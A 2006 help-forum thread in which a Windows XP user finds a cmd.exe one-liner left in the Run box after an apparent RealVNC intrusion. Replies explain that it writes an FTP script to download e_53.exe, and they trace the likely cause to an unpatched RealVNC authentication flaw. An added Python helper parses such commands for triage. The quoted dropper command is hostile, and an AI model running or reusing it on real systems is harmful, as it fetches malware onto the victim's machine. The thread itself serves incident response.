Solved

Have I been hacked?

Posted on 2006-11-02
Last Modified: 2013-12-04
When I returned to my Windows XP PC after leaving the (password protected) RealVNC server running, I saw the Run... window had been opened and it contained the following string:
cmd.exe /c del i&echo open 127.0.0.1 31006 > i&echo user 1 1 >> i &echo get e_53.exe >> i &echo quit >> i &ftp -n -s:i &e

What does the above mean, please?
Question by:EugeneGardner
LVL 9

Accepted Solution

by:
FixingStuff earned 40 total points
ID: 17863044
Looks like there was a hack attempt. The command does the following:
Creates a file called i with the following contents:
open 127.0.0.1 31006
user 1 1
get e_53.exe
quit

Then it tries to run FTP using the above file as a script.

You are either wide open on the internet... no firewall, or have port forwarding to VNC, which will get port scanned constantly.
Recommendation: LOCK DOWN YOUR MACHINE ASAP.  At least change the default port on VNC.

Go here and run ShieldsUP to check your open ports to the world.
www.grc.com

FS-
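
Added example, not part of the original thread: a small Python triage helper that replays the echo redirections in a captured cmd.exe one-liner, rebuilds the script file handed to ftp -s:, and pulls out the server, port, login and requested file. The function names rebuild_ftp_script and summarise are made up for this illustration; the sample input is the command quoted in the question.

```python
import re

# Command line as quoted in the question; the page cuts it off after "&e".
SAMPLE = ("cmd.exe /c del i&echo open 127.0.0.1 31006 > i&echo user 1 1 >> i "
          "&echo get e_53.exe >> i &echo quit >> i &ftp -n -s:i &e")

ECHO_RE = re.compile(r"^echo\s+(.*?)\s*(>>?)\s*(\S+)$", re.I)
FTP_RE = re.compile(r"^ftp(?:\.exe)?\s.*?-s:(\S+)", re.I)


def rebuild_ftp_script(cmdline):
    """Replay the echo redirections; return (script name, lines) given to ftp -s:."""
    files = {}
    body = re.sub(r"^\s*cmd(?:\.exe)?\s+/c\s+", "", cmdline, flags=re.I)
    # Naive split on "&": quoted or ^-escaped ampersands are not handled.
    for part in (p.strip() for p in body.split("&")):
        echo = ECHO_RE.match(part)
        ftp = FTP_RE.match(part)
        if echo:
            text, op, name = echo.groups()
            if op == ">":          # ">" truncates the file
                files[name] = [text]
            else:                  # ">>" appends to it
                files.setdefault(name, []).append(text)
        elif re.match(r"^del\s+\S", part, re.I):
            files.pop(part.split()[-1], None)
        elif ftp:
            return ftp.group(1), files.get(ftp.group(1), [])
    return None, []


def summarise(lines):
    """Extract server, port, login name and requested files from the script."""
    info = {"host": None, "port": None, "user": None, "get": []}
    for words in (line.split() for line in lines):
        verb = words[0].lower() if words else ""
        if verb == "open" and len(words) > 1:
            info["host"] = words[1]
            has_port = len(words) > 2 and words[2].isdigit()
            info["port"] = int(words[2]) if has_port else 21
        elif verb == "user" and len(words) > 1:
            info["user"] = words[1]
        elif verb in ("get", "recv") and len(words) > 1:
            info["get"].append(words[1])
    return info


if __name__ == "__main__":
    name, script = rebuild_ftp_script(SAMPLE)
    print(name, script, summarise(script))
```

A command line that builds a file with echo and then passes it to ftp -s: is worth alerting on in process-creation logs; the extracted host, port and file name give the responder something to search for.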
 
LVL 1

Author Comment

by:EugeneGardner
ID: 17865217
Thanks.  GRC thinks I am secure (as I am behind a firewall).  My port 31006 is in 'stealth' mode.
I'm not sure how the Run... command was caused to be issued as my RealVNC connection is password protected.  And where would the e_53.exe file be dropped?  I can't find it anywhere.  Another thing I don't understand is what would the point of running a script like that be?  There is no execute command!
 
LVL 9

Expert Comment

by:FixingStuff
ID: 17868447
Good that you are secure!
You probably should go back to GRC ShieldsUP and check port 5900.  Select the "lookup specific port information" button, enter 5900, then click the "Probe This Port" button. That is the default RealVNC port. I also suggest that you change the default to some other unique, unknown port. I don't know how they got past your password, but it looks like they did somehow. Again, change the default port and you should probably change the password as well.
As far as what would be accomplished by the FTP script, I agree... it does not look like it would really do anything, especially if the e_53.exe does not exist on your system. It was probably just an attempt to prepare your machine to be a bot of some kind or allow it to be remotely controlled by a hacker.
FS-
LVL 21

Assisted Solution

by:briancassin
briancassin earned 20 total points
ID: 17871591
This issue seems to be directly related to RealVNC.

How old is it?

There was a serious security flaw found back around May of this year; if you have not updated it, it may be that attackers are getting into your system because you are running an unpatched version of VNC.

Source: eWeek

A "highly critical" flaw in RealVNC's virtual network computing software could allow malicious hackers to access a remote system without a password, according to a published advisory. RealVNC, the Cambridge, U.K.-based company that invented the open-source software, has acknowledged the flaw and posted patches for all affected versions. The RealVNC software, which competes with Symantec's pcAnywhere, allows users to access a remote computer from a local PC. The company distributes the software in three versions: free, personal and enterprise edition. The vulnerability is caused due to an error within the handling of VNC password authentication requests. It can be exploited to bypass authentication and allows access to the remote system without requiring knowledge of the VNC password.
 
LVL 1

Author Comment

by:EugeneGardner
ID: 17872691
Ahh - good point.  I'm running version 4.1.1.  I have just downloaded version 4.1.2.
Thanks.
 
LVL 9

Expert Comment

by:FixingStuff
ID: 17874034
Good find! I'm on 4.1.1 also. Guess it's time for an update, however, I only use VNC via VPN... very secure that way.
FS-